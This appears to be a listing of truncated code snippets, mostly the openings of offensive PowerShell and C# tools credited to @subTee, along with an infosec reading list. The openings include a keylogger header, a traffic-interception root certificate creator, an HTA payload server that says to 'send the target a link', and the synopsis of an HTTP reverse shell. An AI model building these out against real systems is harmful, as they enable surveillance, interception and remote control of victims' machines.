DanielRTeixeira

function Start-PACFileHosting()
	{
		# Example PAC File Hosting
		# Pattern after http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html
		# example: http://localhost:8083/i.pac
		# Be Certain Line 19 matches your Interceptor Config
		Start-Job -ScriptBlock {
				
				$Hso = New-Object Net.HttpListener
				$Hso.Prefixes.Add("http://+:8083/")

DanielRTeixeira

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
	<!-- Encrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pef "secretStuff" "C:\Tools" -->
	<!-- Decrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pdf "secretStuff" "C:\Tools" -->
	<!-- See https://msdn.microsoft.com/en-us/library/2w117ede.aspx --> 
	<!-- Example by @subTee -->
	<connectionStrings>
		<add name="constr" connectionString="blah" /> 
	</connectionStrings>
  <system.web>

DanielRTeixeira

<#
  Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
  To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>

function Receive-Request {
   param(      
      $Request
   )
   $output = ""

DanielRTeixeira

<#
	Created By Casey Smith
	@subTee
	
	RSA in PowerShell.  
	Just Cause...
	
	Reference notes for the curious
	p  = 61    <= first prime number (destroy this after computing e and d)
	q  = 53    <= second prime number (destroy this after computing e and d)

DanielRTeixeira

using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/* 
 * https://code.google.com/p/klog-sharp/
*/

DanielRTeixeira

using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;

DanielRTeixeira

Infosec Team Book List

The Cuckoo's Egg - Cliff Stoll
Hacking, The Art of Exploitation - Jon Ericson
Art of Memory Forensics - by Michael Hale Ligh, Andrew Case, Jamie Levy, AAron Walters
Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground - Kevin Poulsen
Ghost in the Wires: My Adventures as the World's Most Wanted Hacker - Kevin Mitnick
Daemon - Daniel Suarez

DanielRTeixeira

function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
{
	$CAsubject = $certSubject
	$dn = new-object -com "X509Enrollment.CX500DistinguishedName"
	$dn.Encode( "CN=" + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
	#Issuer Property for cleanup
    $issuer = "__Interceptor_Trusted_Root"
	$issuerdn = new-object -com "X509Enrollment.CX500DistinguishedName"
	$issuerdn.Encode("CN=" + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
	# Create a new Private Key

DanielRTeixeira

using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Security.Cryptography;

DanielRTeixeira

<#
    
  Author: Casey Smith @subTee

  License: BSD3-Clause
	
  .SYNOPSIS
  
  Simple Reverse Shell over HTTP. Execute Commands on Client.